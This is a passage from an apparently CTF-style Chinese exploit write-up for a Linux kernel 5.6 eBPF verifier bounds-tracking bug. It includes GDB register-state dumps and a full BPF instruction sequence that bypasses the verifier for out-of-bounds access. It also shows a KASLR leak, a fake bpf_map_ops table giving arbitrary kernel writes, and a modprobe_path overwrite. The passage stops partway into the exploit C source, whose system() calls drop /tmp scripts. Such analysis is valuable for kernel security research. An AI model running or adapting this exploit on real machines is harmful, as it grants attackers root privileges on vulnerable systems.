		u64 false_umax = opcode == BPF_JGT ? val    : val - 1;
		//当为BPF_JGT时，true_umin的值为val+1，否则为val
    	u64 true_umin = opcode == BPF_JGT ? val + 1 : val;

		if (is_jmp32) {
			false_umax += gen_hi_max(false_reg->var_off);
			true_umin += gen_hi_min(true_reg->var_off);
		}
		false_reg->umax_value = min(false_reg->umax_value, false_umax);
		//修改true_reg的umin_Value值
		true_reg->umin_value = max(true_reg->umin_value, true_umin);
		break;
	}

//同理，BPF_JLT和BPF_JLT可以修改true_reg的umax_value
	case BPF_JLE:
	case BPF_JLT:
	{
		u64 false_umin = opcode == BPF_JLT ? val    : val + 1;
		//若不为BPF_JLT,则true_umax=val
		u64 true_umax = opcode == BPF_JLT ? val - 1 : val;

		if (is_jmp32) {
			false_umin += gen_hi_min(false_reg->var_off);
			true_umax += gen_hi_max(true_reg->var_off);
		}
		false_reg->umin_value = max(false_reg->umin_value, false_umin);
		true_reg->umax_value = min(true_reg->umax_value, true_umax);
		break;
	}

根据上面的分析，要修改 r6.umin_Value就要调用 BPF_JGE或BPF_JGT，要修改r6.umax_value就要调用BPF_JLE或BPF_JLT。上面函数中的 val是我们输入代码的立即数。那么这里就能够通过构造合适的 val来修改值。

修改r6.umin_value

首先可以利用如下指令，来修改r6.umin_vale：

BPF_JMP_IMM(BPF_JGE,6,1,1)

这个指令，最后会跳转到 BPF_JGE流程，然后val=1，所以true_umin=1。然后由于当初始化 r6结构体时，r6.umin_value=0，所以最后 r6.umin_value=1。

//初始时r6结构体如下：
pwndbg> p/x (struct bpf_reg_state)other_branch_regs[insn->dst_reg] 
$67 = {                                                            
  type = 0x1,                                                      
  {                                                                
    range = 0x0,                                                   
    map_ptr = 0x0,                                                 
    btf_id = 0x0,                                                  
    raw = 0x0                                                      
  },                                                               
  off = 0x0,                                                       
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0xffffffffffffffff
  },
  smin_value = 0x8000000000000000,
  smax_value = 0x7fffffffffffffff,
  umin_value = 0x0,
  umax_value = 0xffffffffffffffff,
  parent = 0xffff88800d4a1270,
  frameno = 0x0,
  subreg_def = 0x0,
  live = 0x4,
  precise = 0x1
}

pwndbg> p/x insn->dst_reg	//目标结构体为r6
$68 = 0x6   
pwndbg> p/x insn->imm      //立即数val=1     
$70 = 0x1     

//执行完后，r6结构体的umin_value=1
pwndbg> p/x (struct bpf_reg_state)*true_reg     
$75 = {                                         
  type = 0x1,                                   
  {                                             
    range = 0x0,                                
    map_ptr = 0x0,                              
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0xffffffffffffffff
  },
  smin_value = 0x8000000000000000,
  smax_value = 0x7fffffffffffffff,
  umin_value = 0x1,
  umax_value = 0xffffffffffffffff,
  parent = 0xffff88800d4a1270,
  frameno = 0x0,
  subreg_def = 0x0,
  live = 0x4,
  precise = 0x1
}

然后，由于用户层输入的 立即数imm最多只能为32位，所以想要直接修改val的值为 0x100000001是不可能的。这里就需要借助一个其他寄存器，使另一个寄存器的 umax_value=0x100000001，然后再将其值赋给 r6。

修改r6.umax_value

这里首先讲解如何构造一个寄存器的umax_value=0x100000001。
如果一个寄存器的值就是 0x100000001，那么其umax_value自然也为 0x100000001。

BPF_MOV64_IMM(8,0x1),           //r8=0x1
BPF_ALU64_IMM(BPF_LSH,8,32),    //r8 =0x100000000
BPF_ALU64_IMM(BPF_ADD,8,1),     //r8=0x100000001

这里通过上述指令，就能够将r8.umax_value=0x100000001。
最终r8的结构体如下：

pwndbg> p/x (struct bpf_reg_state)*src_reg
$82 = {
  type = 0x1,
  {
    range = 0x0,
    map_ptr = 0x0,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x100000001,
    mask = 0x0
  },
  smin_value = 0x100000001,
  smax_value = 0x100000001,
  umin_value = 0x100000001,
  umax_value = 0x100000001,
  parent = 0xffff88800e960b40,
  frameno = 0x0,
  subreg_def = 0x0,
  live = 0x0,
  precise = 0x1
}

然后可以用如下指令，来将 r8.umax_value赋值给r6：

BPF_JMP_REG(BPF_JLE,6,8,1)

这个指令的源地址是寄存器r8，所以其按理会调用check_cond_jmp_op函数的如下部分：

if (tnum_is_const(src_reg->var_off) ||
    (is_jmp32 && tnum_is_const(src_lo->var_off)))
             //调用reg_set_min_max函数修改false_reg和true_reg的范围
	reg_set_min_max(&other_branch_regs[insn->dst_reg],
			dst_reg,
			is_jmp32
			? src_lo->var_off.value
			: src_reg->var_off.value,
			opcode, is_jmp32);

但是，调试时发现当我想跟进这个函数时，程序又直接跳转到下面立即数的处理部分：

   //若源操作数是一个立即数，也会调用reg_set_min_max函数修改false_reg和true_reg的范围
   else if (dst_reg->type == SCALAR_VALUE) {
	reg_set_min_max(&other_branch_regs[insn->dst_reg],
				dst_reg, insn->imm, opcode, is_jmp32);
}

而其各参数如下：

pwndbg> p/x insn->dst_reg	//目的寄存器为r6
$84 = 0x6
pwndbg> p/x insn->src_reg	//源寄存器为r8
$85 = 0x8
pwndbg> p/x src_reg->var_off.value	//val为0x100000001
$88 = 0x100000001

//目的寄存器为r6
pwndbg> p/x (struct bpf_reg_state)*dst_reg    
$81 = {                                       
  type = 0x1,                                 
  {                                           
    range = 0x0,                              
    map_ptr = 0x0,                            
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0xffffffffffffffff
  },
  smin_value = 0x8000000000000000,
  smax_value = 0x7fffffffffffffff,
  umin_value = 0x1,
  umax_value = 0xffffffffffffffff,
  parent = 0xffff88800e960a70,
  frameno = 0x0,
  subreg_def = 0x0,
  live = 0x0,
  precise = 0x1
}
//源寄存器为r8
pwndbg> p/x (struct bpf_reg_state)*src_reg
$82 = {
  type = 0x1,
  {
    range = 0x0,
    map_ptr = 0x0,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x100000001,
    mask = 0x0
  },
  smin_value = 0x100000001,
  smax_value = 0x100000001,
  umin_value = 0x100000001,
  umax_value = 0x100000001,
  parent = 0xffff88800e960b40,
  frameno = 0x0,
  subreg_def = 0x0,
  live = 0x0,
  precise = 0x1
}

从参数上来看，仍然是执行的我们输入的指令。产生这种情况的原因，可能是由于编译器优化，将这两种情况进行了合并。但是，只要参数正确。那么就不会有问题。
最终，其会进入BPF_JLE分支，val=0x100000001，true_umax_value=0x100000001，最终修改true_reg.umax_value=0x100000001。

pwndbg> p/x (struct bpf_reg_state)*true_reg
$101 = {
  type = 0x1,
  {
    range = 0x0,
    map_ptr = 0x0,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0x1ffffffff
  },
  smin_value = 0x1,
  smax_value = 0x100000001,
  umin_value = 0x1,
  umax_value = 0x100000001,
  parent = 0xffff88800e960a70,
  frameno = 0x0,
  subreg_def = 0x0,
  live = 0x0,
  precise = 0x1
}

触发漏洞

通过上面的方法，我们已经能够成功构造r6的umin_Value和umax_Value。然后就需要来触发这个漏洞。运用如下指令触发即可：

BPF_JMP32_IMM(BPF_JNE,6,5,1)

最后可以看到r6的结构体如下，其值value=1。说明我们的漏洞触发成功。

pwndbg> p/x (struct bpf_reg_state)*true_reg
$112 = {
  type = 0x1,
  {
    range = 0x0,
    map_ptr = 0x0,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x1,
    mask = 0x100000000
  },
  smin_value = 0x1,
  smax_value = 0x100000001,
  umin_value = 0x1,
  umax_value = 0x100000001,
  parent = 0xffff88800e960a70,
  frameno = 0x0,
  subreg_def = 0x0,
  live = 0x0,
  precise = 0x1
}

漏洞利用

其实整体的利用思路和之前的CVE-2017-16995很像，都是先利用漏洞绕过bpf_check检测，然后在实际执行时执行恶意指令。

这里这个漏洞的作用总结来说就是能够使一个寄存器在模拟检测时其值固定为1，然而在真实执行时其值可以被我们所控制为其他的合法值。

如何利用这个固定为1？可以思考如果利用r6的值来做读取的索引，因为模拟检测时，bpf_check认为其固定为1，而真实执行我们可以将该值改大，那么检测时bpf_check认为读取索引合法，然后真实执行被改大了，则可以造成越界读取。

同理，我们可以实现一个任意地址写。有了这两个功能，那么提权的方法也就十分多样了。

cve-2017-16995绕过思路分析

但是，这里最开始想简单了，5.6版本的bpf相比于4.4.110版本做了很多更改。影响比较大的就是对于模拟寄存器的结构体的修改，导致之前cve-2017-16995的利用方法不能使用了。这里还是说明一下为什么之前的方法不能用吧。

按照之前的思路，这里r6.value=1，那么可以直接构造以下指令，来使verifier误认为程序进入了一个确定的exit(0)分支，从而绕过对后续指令的检查。

BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 2),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),

evil_code，

按理说，由于 BPF_REG_6.value==1，此时第一条指令的判断会恒成立，所以程序会直接执行exit(0)函数，从而跳过了对后续恶意指令的检测。但是，调试情况却不是如此。经过调试发现原因如下：

首先，虽然经过之前的操作，已经使检测时 bpf_reg_6的结构体如下：

value = 0x1,
mask = 0x100000000

但是，在执行BPF_JMP_IMM检测时，会经过check_cond_jmp_op函数如下代码：

//首先调用is_branch_taken判断哪条分支成立，或是否有恒成立
if (BPF_SRC(insn->code) == BPF_K)
	pred = is_branch_taken(dst_reg, insn->imm,
			       opcode, is_jmp32);
else if (src_reg->type == SCALAR_VALUE &&
	 tnum_is_const(src_reg->var_off))
	pred = is_branch_taken(dst_reg, src_reg->var_off.value,
			       opcode, is_jmp32);
if (pred >= 0) {
	err = mark_chain_precision(env, insn->dst_reg);
	if (BPF_SRC(insn->code) == BPF_X && !err)
		err = mark_chain_precision(env, insn->src_reg);
	if (err)
		return err;
}
//当Pred==1时，说明一条分支恒成立，直接返回
if (pred == 1) {
	/* only follow the goto, ignore fall-through */
	*insn_idx += insn->off;
	return 0;
//当pred==0时，说明另一条分支恒成立，直接返回
} else if (pred == 0) {
	/* only follow fall-through branch, since
	 * that's where the program will go
	 */
	return 0;
}
//若没有恒成立的分支，则将当前不执行的另一条分支压入栈内
other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx,
			  false);

可以看到其对分支有3种情况，如果有恒成立的分支，则直接返回了。如果并非恒成立，则调用push_stack将当前不执行的分支压入栈内。

这里分析一下is_branch_taken函数如下，直接分析BPF_JNE情况。其会调用tnum_is_const函数判断，否则将会直接返回-1。然而在 tnum_is_const中，会判断BPF_REG_6的mask是否有值，若有值则返回0。由于这里BPF_REG_6.mask有值，所以会返回0。最终导致在check_cond_jmp_op函数中，仍然有分支被压入栈内。

is_branch_taken：
	case BPF_JNE:
		if (tnum_is_const(reg->var_off))
			return !tnum_equals_const(reg->var_off, val);
		break;
	...
	
	return -1;

/* Returns true if @a is a known constant */
//判断mask是否有值
static inline bool tnum_is_const(struct tnum a)
{
	return !a.mask;
}

然而，在检测BPF_EXIT_INSN指令时，最后会调用pop_stack从栈中弹出分支，若没有分支直接调用break终止检查，若有分支还需要对分支进行检查。而由于在上面，已经压入了一个分支。所以，这里就会对后续的分支进行检查，所以，我们之前的利用思路在这里失败了。

else if (opcode == BPF_EXIT) {
				if (BPF_SRC(insn->code) != BPF_K ||
				    insn->imm != 0 ||
				    insn->src_reg != BPF_REG_0 ||
				    insn->dst_reg != BPF_REG_0 ||
				    class == BPF_JMP32) {
					verbose(env, "BPF_EXIT uses reserved fields\n");
					return -EINVAL;
				... //有省略
process_bpf_exit:
				update_branch_counts(env, env->cur_state);
                //弹出分支
				err = pop_stack(env, &prev_insn_idx,
						&env->insn_idx);
				if (err < 0) {
					if (err != -ENOENT)
						return err;
					break;
				} else {
					do_print_state = true;
					continue;
				}

如果另一个分支永远不执行，那么会将这部分代码填充为trap指令。从而在真正执行时，虽然绕过检查了，但是会导致陷入死循环。

	/* instruction rewrites happen after this point */
	if (is_priv) {
		if (ret == 0)
			opt_hard_wire_dead_code_branches(env);
		if (ret == 0)
			ret = opt_remove_dead_code(env);
		if (ret == 0)
			ret = opt_remove_nops(env);
	} else {
		if (ret == 0)
			sanitize_dead_code(env);
	}

static void sanitize_dead_code(struct bpf_verifier_env *env)
{
	struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
	struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
	struct bpf_insn *insn = env->prog->insnsi;
	const int insn_cnt = env->prog->len;
	int i;

	for (i = 0; i < insn_cnt; i++) {
		if (aux_data[i].seen)
			continue;
		memcpy(insn + i, &trap, sizeof(trap));
	}
}

ZDI-思路分析

bpf指令分析

struct bpf_insn insns[]={

    BPF_LD_MAP_FD(BPF_REG_1,3), //r1=map_fd

    BPF_ALU64_IMM(BPF_MOV,6,0), //r6 = 0
    BPF_STX_MEM(BPF_DW,10,6,-8),    //*(r10-8)=r6
    BPF_MOV64_REG(7,10),          //r7 = r10
    BPF_ALU64_IMM(BPF_ADD,7,-8),    //r7 += -8 -> r7 = fp-8
    BPF_MOV64_REG(2,7),             // r2 = r7
    BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,0,0,	//args: r1 = map_fd, r2=fp-8=0
            BPF_FUNC_map_lookup_elem),  //r0=&map[0]
    BPF_JMP_IMM(BPF_JNE,0,0,1), //if(reg0 != 0) exit
    BPF_EXIT_INSN(),
  
    BPF_MOV64_REG(9,0),     //r9 =r0 = &map[0]

    BPF_LDX_MEM(BPF_DW,6,9,0),  //r6 = *r9=ctrlmap[0]
    // offset

    /*// BPF_JGE 看 tnum  umin 1*/
    BPF_ALU64_IMM(BPF_MOV,0,0), //r0 = 0

    BPF_JMP_IMM(BPF_JGE,6,1,1), //if(r6 >= 1)(exit())
    BPF_EXIT_INSN(),    

    BPF_MOV64_IMM(8,0x1),   // r8 = 1
    BPF_ALU64_IMM(BPF_LSH,8,32),    //(r8)<<32	-> r8=0x100000000
    BPF_ALU64_IMM(BPF_ADD,8,1),     // r8 += 1 -> r8=0x100000001
     /*BPF_JLE 看 tnum  umax 0x100000001*/
    BPF_JMP_REG(BPF_JLE,6,8,1),     // if(r6 <= r8)(jmp 1)
    BPF_EXIT_INSN(),

    /*//  JMP32  看 offset*/
    BPF_JMP32_IMM(BPF_JNE,6,5,1),   //if(r6!=5)(jmp 1)
    BPF_EXIT_INSN(),

  	//bypass bpf_check
    BPF_ALU64_IMM(BPF_AND, 6, 2),   //r6 & 2 (r2=2,in runtime)
    BPF_ALU64_IMM(BPF_RSH, 6, 1),   //r6>>1 -> r6=0x1(runtime)

    //r6 == offset
    //r9 = inmap
    /*BPF_ALU64_REG(BPF_MUL, 6, 7),*/
    BPF_ALU64_IMM(BPF_MUL,6,0x110), //r6 *= 0x110 -> r6=0x110

    // outmap
    BPF_LD_MAP_FD(BPF_REG_1,4),     //r1 = expmap

    BPF_ALU64_IMM(BPF_MOV,8,0),     //r8 = 0
    BPF_STX_MEM(BPF_DW,10,8,-8),    // fp-8 = r8

    BPF_MOV64_REG(7,10),            // r7 = r10 = fp
    BPF_ALU64_IMM(BPF_ADD,7,-8),    // r7 += -8
    BPF_MOV64_REG(2,7),             // r2 = r7
    BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,0,0,    //args: r1=expmap, r2=0
            BPF_FUNC_map_lookup_elem),  //	r0 = &expmap[0]
    BPF_JMP_IMM(BPF_JNE,0,0,1),     // if(r0 != 1)(jmp 0)
    BPF_EXIT_INSN(),            

    BPF_MOV64_REG(7,0),             //r7 = r0 = &expmap[0]

    BPF_ALU64_REG(BPF_SUB,7,6),     //r7 -= r6 -> r7 -= 0x110 -> r7 = &bpf_map//越界

    BPF_LDX_MEM(BPF_DW,8,7,0),      //r8 = *r7 = bpf_map_ops
    /*// inmap[2] == map_addr*/
    BPF_STX_MEM(BPF_DW,9,8,0x10),   //*(r9+0x10) = r8 -> map_fd[2] = bpf_map_ops
    BPF_MOV64_REG(2,8),             //r2 = r8

    BPF_LDX_MEM(BPF_DW,8,7,0xc0),   //r8 = *(r7+0xc0) = wait_list_addr
    BPF_STX_MEM(BPF_DW,9,8,0x18),   //*(r9+0x18) = r8  map_fd[3] = wait_list_addr 

    BPF_STX_MEM(BPF_DW,7,8,0x40),   //*(r7+0x40) = r8  -> map->btf = wait_list_addr
    BPF_ALU64_IMM(BPF_ADD,8,0x50),  //r8 += 0x50   r8 = map_array_addr


    BPF_LDX_MEM(BPF_DW,2,9,0x8),    //r2 = *(r9+0x8) -> r2 = map_fd[2]
    BPF_JMP_IMM(BPF_JNE,2,1,4),     //if(r2 != 4)(jmp 1)
    BPF_STX_MEM(BPF_DW,7,8,0), //ops    //*r7 = r8  -> map->ops = map_array_addr
    BPF_ST_MEM(BPF_W,7,0x18,BPF_MAP_TYPE_STACK),//map type  map->type = 0x17
    BPF_ST_MEM(BPF_W,7,0x24,-1),// max_entries		map->max_entries = 0xffffffff
    BPF_ST_MEM(BPF_W,7,0x2c,0x0), //lock_off		map-lock_off = 0x0


    BPF_ALU64_IMM(BPF_MOV,0,0),    //r0 = 0
    BPF_EXIT_INSN(),
};

bpf_check绕过

  BPF_LD_MAP_FD(BPF_REG_1,3), //reg1=crtl_mapfd

  BPF_ALU64_IMM(BPF_MOV,6,0), //reg6 = 0
  BPF_STX_MEM(BPF_DW,10,6,-8),    //*(reg10-8)=*(fp-8)=reg6
  BPF_MOV64_REG(7,10),          //reg7 = reg10 = fp
  BPF_ALU64_IMM(BPF_ADD,7,-8),    //reg7 += -8 = fp-8
  BPF_MOV64_REG(2,7),             // reg2 = reg7 = fp-8
  BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,0,0,
          BPF_FUNC_map_lookup_elem),  //reg0=
  BPF_JMP_IMM(BPF_JNE,0,0,1), //if(reg0 != 0)(jmp 1)
  BPF_EXIT_INSN(),
  // r9 = ctrlmap[0]
  BPF_MOV64_REG(9,0),     //reg9 =reg0
  //
  BPF_LDX_MEM(BPF_DW,6,9,0),  //reg6 = *reg9=ctrlmap[0]
  // offset

  /*// BPF_JGE 看 tnum  umin 1*/
  BPF_ALU64_IMM(BPF_MOV,0,0), //reg0 = 0
//umin = 0x1
  BPF_JMP_IMM(BPF_JGE,6,1,1), //if(reg6 >= 1)(exit())
  BPF_EXIT_INSN(),    
//make reg8 umax = 0x100000001
  BPF_MOV64_IMM(8,0x1),   //reg8 = 1
  BPF_ALU64_IMM(BPF_LSH,8,32),    //(reg8)<<32
  BPF_ALU64_IMM(BPF_ADD,8,1),     //reg8 += 1
   
/*BPF_JLE 看 tnum  umax 0x100000001*/
  //reg6 umax=0x100000001
BPF_JMP_REG(BPF_JLE,6,8,1),     // if(reg6 <= reg8)(jmp 1)
  BPF_EXIT_INSN(),

//reg6 value = 0x1
  /*//  JMP32  看 offset*/
  BPF_JMP32_IMM(BPF_JNE,6,5,1),   //if(reg6!=5)(jmp 1)
  BPF_EXIT_INSN(),

这段bpf指令的作用是通过前面的漏洞绕过bpf的检测，这里说明如下：

• 首先对各寄存器进行了初步赋值，这里重点说明对reg1赋值为了初始创建的两个map中的当一个地址；

• 然后将reg9赋值为reg6，也即将reg6的值赋值为crtlmapfd[0]的值，由于并没有使用立即数赋值，所以这里并不会直接知道reg6的值；

• 然后将reg6与0进行了一个BPF_JGE的比较，这里就会使得reg6的umin为 0x1

• 然后将reg8的值设置为0x100000001，随后与reg6进行一个BPF_JLE的比较，这会使得reg6的umax为0x100000001

• 最后将reg6与reg5进行一个比较，这里就会进入漏洞函数，最终触发漏洞，使得bpf_check时 认为reg6的value为0x1

地址泄漏

前面的分析，已经说明了可以在bpf_check时，使得reg6的value被认为0x1。但是，在真实执行时，我们却可以通过map对reg6赋值为2。如下代码所示：

BPF_ALU64_IMM(BPF_AND, 6, 2)
BPF_ALU64_IMM(BPF_RSH, 6, 1)

这里真实执行时r6 = 2，但在verifier过程到这里 r6会被认为是1，( 1 & 2 ) >> 1 == 0，但是实际运行的时候 ( 2 & 2 ) >> 1 == 1：

接下来让r6 = r6 * 0x110 ，这样 verifier过程仍然认为它是0，但是运行过程的实际值确实 0x110：

BPF_ALU64_IMM(BPF_MUL, 6, 0x110)

我们获取一个map，叫它expmap吧， r7 = expmap[0]：

BPF_MOV64_REG(7, 0)

然后r7 = r7 - r6，因为r7是指针类型， verifier会根据map的size来检查边界，但是verifier的时候认为r6 == 0，r7 - 0 == r7，所以可以通过检查，但是运行的时候我们可以让r7 = r7 - 0x110，然后BPF_LDX_MEM(BPF_DW, 8, 7, 0)就可以做越界读写了：

BPF_ALU64_REG(BPF_SUB, 7, 6)

eBPF使用bpf_map来保存map信息，也就是map_create得到的地址：

struct bpf_map {
    const struct bpf_map_ops *ops;
    struct bpf_map *inner_map_meta;
    void *security;
    enum bpf_map_type map_type;
    //....
    u64 writecnt;
}

在map_lookup_elem的时候， 使用的是bpf_array，它的开头是bpf_map，然后value就是map的每一个项的数组，也就是说bpf_map刚好在r7的低地址处（r7是第一个value），这里查看内存可以知道map在r7 - 0x110的地方：

struct bpf_array {
    struct bpf_map map;
    u32 elem_size;
    u32 index_mask;
    struct bpf_array_aux *aux;
    union {
        char value[];//<--- elem
        void *ptrs[];
        void *pptrs[];
    };
}

于是我们就可以读写bpf_map来做后续的利用。

首先是地址泄漏，bpf_map有一个const struct bpf_map_ops ops字段，当我们创建的map是BPF_MAP_TYPE_ARRAY的时候保存的是array_map_ops，这是一个全局变量，保存在rdata段，通过它可以计算KASLR的偏移。运行的时候可以在下面的wait_list处泄漏出map的地址：

gef➤  p/a *(struct bpf_array *)0xffff88800d878000              
$5 = {  
  map = {          
    ops = 0xffffffff82016340 <array_map_ops>,// <-- 泄露内核地址
    inner_map_meta = 0x0 <fixed_percpu_data>,
    security = 0xffff88800e93f0f8,
    map_type = 0x2 <fixed_percpu_data+2>,
    key_size = 0x4 <fixed_percpu_data+4>,
    value_size = 0x2000 <irq_stack_backing_store>, 
    max_entries = 0x1 <fixed_percpu_data+1>,
//...    
    usercnt = {    
//..
      wait_list = {
        next = 0xffff88800d8780c0,// <-- 泄露 map 地址
        prev = 0xffff88800d8780c0
      }
    },
    writecnt = 0x0 <fixed_percpu_data>
  },
  elem_size = 0x2000 <irq_stack_backing_store>,
  index_mask = 0x0 <fixed_percpu_data>,
  aux = 0x0 <fixed_percpu_data>,
  {
    value = 0xffff88800d878110,// <-- r7
    ptrs = 0xffff88800d878110,
    pptrs = 0xffff88800d878110
  }
}

任意内存写

我们可以用r7 写入 ops = 0xffffffff82016340 <array_map_ops>, 改成我们自己的fake_ops, 因为前面我们已经泄露出map 的地址了，那么完全可以用map_update_elem 伪造一个ops, 然后改一下指针就可以劫持控制流了，zdi上的writeup 用了一个更好的办法。

gef➤  p/a *(struct bpf_map_ops *)0xffffffff82016340
$11 = {
  map_alloc_check = 0xffffffff8116ec70 <array_map_alloc_check>,
  map_alloc = 0xffffffff8116fa00 <array_map_alloc>,
  map_release = 0x0 <fixed_percpu_data>,
  map_free = 0xffffffff8116f2d0 <array_map_free>,
  map_get_next_key = 0xffffffff8116ed50 <array_map_get_next_key>,
  map_release_uref = 0x0 <fixed_percpu_data>,
  map_lookup_elem_sys_only = 0x0 <fixed_percpu_data>,
  map_lookup_batch = 0xffffffff81159b30 <generic_map_lookup_batch>,
  map_lookup_and_delete_batch = 0x0 <fixed_percpu_data>,
  map_update_batch = 0xffffffff81159930 <generic_map_update_batch>,
  map_delete_batch = 0x0 <fixed_percpu_data>,
  map_lookup_elem = 0xffffffff8116edd0 <array_map_lookup_elem>,
  map_update_elem = 0xffffffff8116f1c0 <array_map_update_elem>,
  map_delete_elem = 0xffffffff8116ed80 <array_map_delete_elem>,
  map_push_elem = 0x0 <fixed_percpu_data>,
  map_pop_elem = 0x0 <fixed_percpu_data>,
  map_peek_elem = 0x0 <fixed_percpu_data>,
  map_fd_get_ptr = 0x0 <fixed_percpu_data>,
  map_fd_put_ptr = 0x0 <fixed_percpu_data>,
  map_gen_lookup = 0xffffffff8116f050 <array_map_gen_lookup>,
  map_fd_sys_lookup_elem = 0x0 <fixed_percpu_data>,
  map_seq_show_elem = 0xffffffff8116ee80 <array_map_seq_show_elem>,
  map_check_btf = 0xffffffff8116f870 <array_map_check_btf>,
  map_poke_track = 0x0 <fixed_percpu_data>,
  map_poke_untrack = 0x0 <fixed_percpu_data>,
  map_poke_run = 0x0 <fixed_percpu_data>,
  map_direct_value_addr = 0xffffffff8116ece0 <array_map_direct_value_addr>,
  map_direct_value_meta = 0xffffffff8116ed10 <array_map_direct_value_meta>,
  map_mmap = 0xffffffff8116ee50 <array_map_mmap>
}

map_push_elem 会在 map_update_elem 的时候被调用, 它需要map 的类型是BPF_MAP_TYPE_QUEUE或者BPF_MAP_TYPE_STACK, 但是没有关系， map 上的任何内容都可以用 r7 来改，把map_type 改成BPF_MAP_TYPE_STACK(0x17)之后，每次调用map_update_elem时, 就会调用map_push_elem

 static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,  
                void *value, __u64 flags)                                     
{                                                                             
//...                    
    } else if (map->map_type == BPF_MAP_TYPE_QUEUE ||     
        ¦  map->map_type == BPF_MAP_TYPE_STACK) {         
        err = map->ops->map_push_elem(map, value, flags); 
//..

在 fake_ops 上, 我们把map_push_elem 改成map_get_next_key 一样的地址， 这里实际的map_get_next_key是函数array_map_get_next_key

uint64_t fake_map_ops[]={

    kaslr +0xffffffff8116ec70,                 
    kaslr +0xffffffff8116fa00,                 
    0x0,                                       
    kaslr +0xffffffff8116f2d0,                 
    kaslr +0xffffffff8116ed50,// 5: map_get_next_key  
    0x0,                                       
    //...                
    kaslr +0xffffffff8116ed80,                 
    kaslr +0xffffffff8116ed50,//15: map_push_elem 
    0x0,                                       
    0x0,                                       
    //...                
}

array_map_get_next_key 实现在kernel/bpf/arraymap.c#L279 上， 传递给map_push_elem 的参数是value(ring3 要update的数据)和 uattr 的 flags, 分别对应array_map_get_next_key 的 key 和 next_key 参数

static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)   
{                                                                                   
    struct bpf_array *array = container_of(map, struct bpf_array, map);             
    u32 index = key ? *(u32 *)key : U32_MAX;                                        
    u32 *next = (u32 *)next_key;                                                    

    if (index >= array->map.max_entries) {    //index                                      
        *next = 0;                                                                  
        return 0;                                                                   
    }                                                                               

    if (index == array->map.max_entries - 1)                                        
        return -ENOENT;                                                             

    *next = index + 1;                                                              
    return 0;                                                                       
}

加入我们运行 map_update_elem(mapfd, &key, &value, flags), 运行到 array_map_get_next_key 之后有

index == value[0], next = flags ， 最终效果是 *flags = value[0]

value[0] 和 flags 都是 ring3 下传入的值，前面我们已经泄露了内核地址，于是就可以通过修改 flags 的值写任意内存啦。写入的index要满足(index >= array->map.max_entries), map_entries 可以用r7 改成0xffff ffff

这里index 和 next 都是 u32 类型， 所以就是任意地址写 4个byte.

具体的操作是

• 1 写 r7 改写 ops 到 fake_ops ( map_push_elem 改成array_map_get_next_key 地址)
• 2 修改 map 的一些字段绕过一些检查
  • spin_lock_off = 0
  • max_entries = 0xffff ffff
  • map_type = BPF_MAP_TYPE_STACK
• 3 调用 map_update_elem 写内存

改modprobe_path 用root任意命令

可以任意地址写这个能力还是挺大的了，zdi 的writeup 上是通过搜索 init_pid_ns， 找到当前的task_struct, 然后写 cred 来获取一个 root shell。

既然已经可以任意地址写了，这里我的做法是改写modprobe_path , 然后就可以用root 权限执行任意指令了，虽然不能起root shell， 但是也是可以达到提权目的了

/tmp 目录下生成 /tmp/chmod 和 /tmp/fake , /tmp/chmod 可以改 /flag 文件的权限

void gen_fake_elf(){                                                       
    system("echo -ne '#!/bin/shn/bin/chmod 777 /flagn' > /tmp/chmod");   
    system("chmod +x /tmp/chmod");                                         
    system("echo -ne '\xff\xff\xff\xff' > /tmp/fake");                 
    system("chmod +x /tmp/fake");                                          
}

然后把modprobe_path 改成 /tmp/chmod, 然后运行 /tmp/fake 就完事啦

expbuf64[0] = 0x706d742f -1;                              
bpf_update_elem(expmapfd,&key,expbuf,modprobe_path);      
expbuf64[0] = 0x6d68632f -1;                              
bpf_update_elem(expmapfd,&key,expbuf,modprobe_path+4);    
expbuf64[0] = 0x646f -1;                                  
bpf_update_elem(expmapfd,&key,expbuf,modprobe_path+8);

EXP

#define _GNU_SOURCE
#include <stdio.h>       
#include <stdlib.h>      
#include <unistd.h>      
#include <fcntl.h>       
#include <stdint.h>      
#include <string.h>      
#include <sys/ioctl.h>   
#include <sys/syscall.h> 
#include <sys/socket.h>  
#include <errno.h>       
#include "linux/bpf.h"   
#include "bpf_insn.h"    

int ctrlmapfd, expmapfd;
int progfd;
int sockets[2];
#define LOG_BUF_SIZE 65535
char bpf_log_buf[LOG_BUF_SIZE];

void gen_fake_elf(){
    system("echo -ne '#!/bin/shn/bin/chmod 777 /flagn' > /tmp/chmod"); 
    system("chmod +x /tmp/chmod");
    system("echo -ne '\xff\xff\xff\xff' > /tmp/fake");
    system("chmod +x /tmp/fake");
}
void init(){
    setbuf(stdin,0);
    setbuf(stdout,0);
    gen_fake_elf();
}
void x64dump(char *buf,uint32_t num){         
    uint64_t *buf64 =  (uint64_t *)buf;       
    printf("[-x64dump-] start : n");         
    for(int i=0;i<num;i++){                   
            if(i%2==0 && i!=0){                   
                printf("n");                     
            }                                     
            printf("0x%016lx ",*(buf64+i));       
        }                                         
    printf("n[-x64dump-] end ... n");       
}                                             
void loglx(char *tag,uint64_t num){         
    printf("[lx] ");                        
    printf(" %-20s ",tag);                  
